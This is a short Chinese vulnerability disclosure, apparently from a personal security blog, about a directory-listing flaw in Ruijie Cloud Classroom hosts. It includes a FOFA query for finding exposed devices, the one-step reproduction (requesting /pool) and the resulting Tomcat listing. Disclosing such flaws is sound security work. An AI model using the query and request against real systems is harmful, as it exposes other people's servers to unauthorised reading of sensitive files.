漏洞描述
i ⭐
锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露.
漏洞影响
s ✅
锐捷云课堂
空间测绘
d ⭕
FOFA:title="Ruijie" && "云课堂主机"
漏洞复现
- ✅访问
http://1.1.1.1/pool
目录遍历
Directory Listing For /
Filename Size Last Modified
Packages.gz 490.8 kb Fri, 26 May 2017 00:22:32 GMT
extra/ Fri, 26 May 2017 00:22:33 GMT
main/ Fri, 26 May 2017 00:22:33 GMT
Apache Tomcat/6.0.24
个人博客
孤桜懶契:https://gylq.gitee.io/time